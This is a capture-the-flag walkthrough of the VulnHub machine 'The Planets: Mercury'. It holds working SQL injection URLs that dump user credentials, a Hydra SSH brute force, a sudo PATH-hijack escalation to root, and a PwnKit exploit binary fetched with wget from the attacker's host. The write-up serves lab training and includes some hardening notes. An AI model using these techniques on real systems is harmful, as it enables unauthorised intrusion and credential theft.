THE PLANETS MERCURY

A detailed walkthrough of THE PLANETS MERCURY, a VulnHub machine. Its attack chain is crisp and standard: every bit of penetration-testing knowledge it exercises is genuinely useful, and all of it is mainstream rather than obscure. It makes a good textbook example of a complete attack chain.

THE PLANETS MERCURY (VulnHub machine)

Information Gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.115
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-15 07:58 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 08:00:27:D5:99:58 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds

The port scan shows that TCP ports 22 and 8080 are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,8080 192.168.56.115
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-15 07:59 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00040s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
| 256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_ 256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Thu, 15 Jun 2023 00:59:20 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html
| X-Frame-Options: DENY
| Content-Length: 2366
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 15 Jun 2023 00:59:20 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 69
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Hello. This site is currently in development please check back later.
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=6/15%Time=648AFD15%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2015\x20Jun\x202
SF:023\x2000:59:20\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.2
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x2
SF:0DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r\
SF:nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\x
SF:20currently\x20in\x20development\x20please\x20check\x20back\x20later\."
SF:)%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2015\x20J
SF:un\x202023\x2000:59:20\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/
SF:3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opti
SF:ons:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\
SF:x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20l
SF:ater\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DT
SF:D\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\
SF:.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<titl
SF:e>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<
SF:body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP/
SF:1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x2
SF:0or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n"
SF:)%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x2
SF:0Thu,\x2015\x20Jun\x202023\x2000:59:20\x20GMT\r\nServer:\x20WSGIServer/
SF:0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Option
SF:s:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<htm
SF:l\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\"
SF:\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20no
SF:t\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x20
SF:<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<style
SF:\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\x
SF:20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x2020
SF:px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x2
SF:0\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee;
SF:\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1p
SF:x\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:normal
SF:;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20font
SF:-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x20
SF:table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:10
SF:0%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
MAC Address: 08:00:27:D5:99:58 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.90 seconds

Web Penetration

Port 8080 serves a robots.txt, but opening it reveals nothing of value (its only entry disallows /). The scan also identified WSGIServer/0.2 CPython/3.8.2; a quick search suggested that a certain application built on these two components has a known vulnerability. Two fingerprint details are worth noting before chasing that lead: WSGIServer/0.2 is the Python standard library's wsgiref server, which Django's runserver uses in development, and the X-Frame-Options: DENY, X-Content-Type-Options: nosniff and Referrer-Policy: same-origin headers are exactly the defaults Django's security middleware emits. This is most likely a Django development server.

Requesting one of that application's paths returned an error page, so this is not that application, but the error page itself contained the information we were looking for.

Because the developer left DEBUG mode enabled, the server leaked sensitive information: Django's debug 404 page lists every URL pattern it tried to match against the request, which gave us the route (directory) information we needed. With DEBUG = False the same request would return a generic 404.

Under that route there are two links, pointing to todo and 1.

SQL Injection

The todo page lists some plans the developer left behind during development, from which we learn two things: there is currently no authentication, and the application talks to MySQL directly. The other link ends in a number, so SQL injection is worth testing there.

Start by appending a single quote.

The single quote triggers an error, and the error message confirms the backend is MySQL. The parameter sits in a numeric context, so no quote needs to be closed. Next, move to a UNION-based injection, first using ORDER BY to determine how many columns the original query returns (the first ORDER BY index that errors is one past the column count).

Then run the UNION query. A single selected column works, so the original query returns one column:

http://192.168.56.115:8080/mercuryfacts/-1 union select database()

This confirms the database name. Next, list the tables in that database:

http://192.168.56.115:8080/mercuryfacts/1 union select group_concat(table_name) from information_schema.tables where table_schema = 'mercury'

Then the column names in the users table:

http://192.168.56.115:8080/mercuryfacts/1 union select group_concat(column_name) from information_schema.columns where table_name = 'users'

Finally, pull the data itself. 0x2d is the hyphen, used here as a field separator so that id, password and username come back in a single concatenated row:

http://192.168.56.115:8080/mercuryfacts/2 union select group_concat(id,0x2d,password,0x2d,username) from users

Hydra Brute Force

Collect the usernames and passwords, write them line by line to a file, then use awk to split the usernames and passwords into separate files. Splitting on '-' only works because none of these passwords contains a hyphen; with a different data set, choose a separator in the group_concat that cannot occur in the values.

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ cat db
1-johnny1987-john
2-lovemykids111-laura
3-lovemybeer111-sam
4-mercuryisthesizeof0.056Earths-webmaster
┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ cat db | awk -F '-' '{print$2}' > passwd

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ cat db | awk -F '-' '{print$3}' > user
┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ hydra -L user -P passwd 192.168.56.115 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-15 08:36:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task
[DATA] attacking ssh://192.168.56.115:22/
[22][ssh] host: 192.168.56.115 login: webmaster password: mercuryisthesizeof0.056Earths
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-15 08:36:38

The brute force finds one valid pair: the webmaster account reuses its database password for SSH. Log in with it.

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ ssh webmaster@192.168.56.115
webmaster@192.168.56.115's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu 15 Jun 01:37:12 UTC 2023

System load: 0.01 Processes: 106
Usage of /: 78.3% of 4.86GB Users logged in: 0
Memory usage: 31% IPv4 address for enp0s3: 192.168.56.115
Swap usage: 0%


22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$ whoami
webmaster
webmaster@mercury:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d5:99:58 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.115/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 497sec preferred_lft 497sec
inet6 fe80::a00:27ff:fed5:9958/64 scope link
valid_lft forever preferred_lft forever
webmaster@mercury:~$ uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
webmaster@mercury:~$ sudo -l
[sudo] password for webmaster:
Sorry, user webmaster may not run sudo on mercury.
webmaster@mercury:~$ ls
mercury_proj user_flag.txt
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]

Privilege Escalation

Information Gathering

webmaster@mercury:~$ ls -liah
total 36K
35299 drwx------ 4 webmaster webmaster 4.0K Sep 2 2020 .
18 drwxr-xr-x 5 root root 4.0K Aug 28 2020 ..
32650 lrwxrwxrwx 1 webmaster webmaster 9 Sep 1 2020 .bash_history -> /dev/null
35301 -rw-r--r-- 1 webmaster webmaster 220 Aug 27 2020 .bash_logout
35300 -rw-r--r-- 1 webmaster webmaster 3.7K Aug 27 2020 .bashrc
165881 drwx------ 2 webmaster webmaster 4.0K Aug 27 2020 .cache
162261 drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 mercury_proj
35302 -rw-r--r-- 1 webmaster webmaster 807 Aug 27 2020 .profile
22 -rw-rw-r-- 1 webmaster webmaster 75 Sep 1 2020 .selected_editor
55367 -rw------- 1 webmaster webmaster 45 Sep 1 2020 user_flag.txt
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls -liah
total 28K
162261 drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 .
35299 drwx------ 4 webmaster webmaster 4.0K Sep 2 2020 ..
165898 -rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3
165900 -rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py
165882 drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 mercury_facts
165766 drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28 2020 mercury_index
165765 drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 mercury_proj
166251 -rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt

Inside the mercury_proj directory there is a notes.txt. It is mode 600, but it belongs to webmaster, so we can read it:

webmaster@mercury:~/mercury_proj$ cat manage.py 
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys

def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mercury_proj.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)

if __name__ == '__main__':
main()
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==

Lateral Movement

The text file contains two usernames with what look like their passwords, Base64-encoded. Decode them:

webmaster@mercury:~/mercury_proj$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mercury:x:1000:1000:mercury:/home/mercury:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
linuxmaster:x:1002:1002:,,,:/home/linuxmaster:/bin/bash

┌──(kali㉿kali)-[~]
└─$ echo -e "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d
mercurymeandiameteris4880km

┌──(kali㉿kali)-[~]
└─$ echo -e "bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK" | base64 -d
mercuryisthesizeof0.056Earths

We also glance at /etc/passwd to confirm that linuxmaster is a real account with a login shell (the webmaster value decodes to the password we already cracked, which corroborates the notes), then switch users:

webmaster@mercury:~/mercury_proj$ su linuxmaster
Password:
linuxmaster@mercury:/home/webmaster/mercury_proj$ cd ~
linuxmaster@mercury:~$ ls
linuxmaster@mercury:~$ ls -liah
total 24K
162165 drwx------ 3 linuxmaster linuxmaster 4.0K Sep 2 2020 .
18 drwxr-xr-x 5 root root 4.0K Aug 28 2020 ..
165762 lrwxrwxrwx 1 linuxmaster linuxmaster 9 Sep 1 2020 .bash_history -> /dev/null
165896 -rw-r--r-- 1 linuxmaster linuxmaster 220 Aug 28 2020 .bash_logout
162221 -rw-r--r-- 1 linuxmaster linuxmaster 3.7K Aug 28 2020 .bashrc
165920 drwx------ 2 linuxmaster linuxmaster 4.0K Aug 28 2020 .cache
166244 -rw-r--r-- 1 linuxmaster linuxmaster 807 Aug 28 2020 .profile

Environment Variables and sudoers Abuse

sudo -l shows that the user may run a shell script as root, and the script calls the tail command. At first I did not think of this escalation path and used polkit instead; the 红队笔记 (Red Team Notes) video supplied this method.

linuxmaster@mercury:/home$ sudo -l
[sudo] password for linuxmaster:
Matching Defaults entries for linuxmaster on mercury:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
(root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:/home$ ls -liah /usr/bin/check_syslog.sh
166272 -rwxr-xr-x 1 root root 39 Aug 28 2020 /usr/bin/check_syslog.sh
linuxmaster@mercury:/home$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:/home$ /usr/bin/check_syslog.sh
tail: cannot open '/var/log/syslog' for reading: Permission denied
linuxmaster@mercury:/home$ sudo /usr/bin/check_syslog.sh
Jun 15 01:37:12 mercury systemd[4101]: Reached target Sockets.
Jun 15 01:37:12 mercury systemd[4101]: Reached target Basic System.
Jun 15 01:37:12 mercury systemd[1]: Started User Manager for UID 1001.
Jun 15 01:37:12 mercury systemd[1]: Started Session 13 of user webmaster.
Jun 15 01:37:12 mercury systemd[4101]: Reached target Main User Target.
Jun 15 01:37:12 mercury systemd[4101]: Startup finished in 73ms.
Jun 15 01:40:32 mercury systemd-networkd[343]: enp0s3: DHCP: No gateway received from DHCP server.
Jun 15 01:40:32 mercury systemd-timesyncd[469]: Network configuration changed, trying to establish connection.
Jun 15 01:45:31 mercury systemd-networkd[343]: enp0s3: DHCP: No gateway received from DHCP server.
Jun 15 01:45:31 mercury systemd-timesyncd[469]: Network configuration changed, trying to establish connection.
linuxmaster@mercury:/home$ id
uid=1002(linuxmaster) gid=1002(linuxmaster) groups=1002(linuxmaster),1003(viewsyslog)

Since the script invokes tail by bare name, the binary is resolved through PATH. The sudoers entry carries the SETENV tag, which lets the caller pass environment variables through sudo, and the output below confirms that a PATH preserved this way is honoured ahead of secure_path. So: create a symlink named tail pointing at vi in a directory we control, prepend that directory to PATH, run the script with sudo --preserve-env=PATH as the SETENV tag permits, and once vi opens as root, run :!bash to get an interactive root shell. Any executable named tail would work; vi is just a convenient way to reach a shell.

linuxmaster@mercury:~$ ln -s /bin/vi tail
linuxmaster@mercury:~$ ls -liah
total 24K
162165 drwx------ 3 linuxmaster linuxmaster 4.0K Jun 15 07:39 .
18 drwxr-xr-x 5 root root 4.0K Aug 28 2020 ..
165762 lrwxrwxrwx 1 linuxmaster linuxmaster 9 Sep 1 2020 .bash_history -> /dev/null
165896 -rw-r--r-- 1 linuxmaster linuxmaster 220 Aug 28 2020 .bash_logout
162221 -rw-r--r-- 1 linuxmaster linuxmaster 3.7K Aug 28 2020 .bashrc
165920 drwx------ 2 linuxmaster linuxmaster 4.0K Aug 28 2020 .cache
166244 -rw-r--r-- 1 linuxmaster linuxmaster 807 Aug 28 2020 .profile
162271 lrwxrwxrwx 1 linuxmaster linuxmaster 7 Jun 15 07:39 tail -> /bin/vi
linuxmaster@mercury:~$ export PATH=.:$PATH
linuxmaster@mercury:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
linuxmaster@mercury:~$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
[sudo] password for linuxmaster:
2 files to edit

root@mercury:/home/linuxmaster#
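
The hijack works because the script resolves tail through PATH and the SETENV tag lets the caller carry PATH across the sudo boundary. The following added example (not from the original post or the box) reproduces both halves without needing sudo: a stand-in check_syslog.sh that calls a bare tail, a fake tail planted in an attacker-controlled directory, and a hardened script that resets PATH itself so the caller's environment no longer matters. The log file, directory names, marker text and function names are constructed for the example.

```python
"""PATH hijack of an unqualified command, and the script-side fix.

Added example, not the Mercury box's code. Runs entirely as the current user:
the point is command resolution, which behaves the same when sudo runs the
script as root with a preserved PATH.
"""
import os
import shutil
import subprocess
import tempfile

# The box's secure_path; a script that must stay safe under SETENV pins it itself.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Attacker's stand-in for the tail -> vi symlink: a marker is easier to assert on
# than an editor, but the lookup being hijacked is identical.
FAKE_TAIL = "#!/bin/sh\necho HIJACKED-TAIL\n"

# Mirrors /usr/bin/check_syslog.sh: 'tail' is looked up through the inherited PATH.
VULNERABLE_SCRIPT = "#!/bin/bash\ntail -n 10 \"$1\"\n"

# Fix: pin PATH before any lookup (calling /usr/bin/tail by absolute path works too).
HARDENED_SCRIPT = "#!/bin/bash\nexport PATH=%s\ntail -n 10 \"$1\"\n" % SECURE_PATH


def _write_exec(path, body):
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, 0o700)


def run_with_attacker_path(script_body):
    """Run script_body with an attacker directory first in PATH; return stdout lines.

    This is what 'export PATH=.:$PATH; sudo --preserve-env=PATH check_syslog.sh'
    does on the box, minus the privilege change.
    """
    work = tempfile.mkdtemp(prefix="hijack-")
    try:
        _write_exec(os.path.join(work, "tail"), FAKE_TAIL)
        script = os.path.join(work, "check_syslog.sh")
        _write_exec(script, script_body)
        log = os.path.join(work, "syslog")  # constructed 12-line stand-in for /var/log/syslog
        with open(log, "w") as fh:
            fh.write("".join("line %d\n" % i for i in range(1, 13)))
        env = dict(os.environ, PATH=work + os.pathsep + SECURE_PATH)
        proc = subprocess.run(["/bin/sh", script, log], env=env,
                              capture_output=True, text=True, check=False)
        return proc.stdout.splitlines()
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print("vulnerable:", run_with_attacker_path(VULNERABLE_SCRIPT))
    print("hardened:  ", run_with_attacker_path(HARDENED_SCRIPT))
```

The vulnerable script prints the attacker's marker; the hardened one prints the last ten log lines regardless of what PATH it inherited. On the sudoers side the equivalent fix is to drop the SETENV tag, since a script that is only ever run under secure_path has no reason to accept a caller-supplied environment.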
linuxmaster@mercury:/home$ find / -type f -perm -04000 -ls 2>/dev/null
1098 164 -rwsr-xr-x 1 root root 166056 Feb 3 2020 /usr/bin/sudo
694 88 -rwsr-xr-x 1 root root 88464 May 28 2020 /usr/bin/gpasswd
1097 68 -rwsr-xr-x 1 root root 67816 Apr 2 2020 /usr/bin/su
571 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
842 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /usr/bin/newgrp
828 56 -rwsr-xr-x 1 root root 55528 Apr 2 2020 /usr/bin/mount
565 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /usr/bin/chfn
497 56 -rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
896 32 -rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec
1167 40 -rwsr-xr-x 1 root root 39144 Apr 2 2020 /usr/bin/umount
676 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
875 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
1381 16 -rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
1374 52 -rwsr-xr-- 1 root messagebus 51344 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1586 464 -rwsr-xr-x 1 root root 473576 May 29 2020 /usr/lib/openssh/ssh-keysign
1596 24 -rwsr-xr-x 1 root root 22840 Aug 16 2019 /usr/lib/policykit-1/polkit-agent-helper-1

Linux Polkit Privilege Escalation, CVE-2021-4034

Seeing polkit-agent-helper-1 and pkexec among the SUID binaries, we can try CVE-2021-4034 (PwnKit), a local privilege escalation in pkexec. Before running anything, check that the installed polkit build is actually unpatched (for example with dpkg -s policykit-1 or pkexec --version), and prefer building a reviewed proof of concept from source over running an opaque prebuilt binary; here the exploit is served from our own attacking machine over HTTP.

linuxmaster@mercury:/tmp$ wget http://192.168.56.106:8088/exploit
--2023-06-15 02:11:03-- http://192.168.56.106:8088/exploit
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4442423 (4.2M) [application/octet-stream]
Saving to: ‘exploit’

exploit 100%[==============================================>] 4.24M --.-KB/s in 0.04s

2023-06-15 02:11:03 (118 MB/s) - ‘exploit’ saved [4442423/4442423]

linuxmaster@mercury:/tmp$ ls
exploit
systemd-private-45c1fa3565004439b6a6c8b9e9d5799b-systemd-logind.service-wwncgi
systemd-private-45c1fa3565004439b6a6c8b9e9d5799b-systemd-resolved.service-4UEN1e
systemd-private-45c1fa3565004439b6a6c8b9e9d5799b-systemd-timesyncd.service-yQdfjg
linuxmaster@mercury:/tmp$ chmod +x exploit
linuxmaster@mercury:/tmp$ ./exploit
2023/06/15 02:11:17 CMDTOEXECUTE is empty fallback to default value
2023/06/15 02:11:17 Executing command sh
# id
uid=0(root) gid=0(root) groups=0(root),1002(linuxmaster),1003(viewsyslog)
# whoami
root
# cd /root
# ls
root_flag.txt
# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
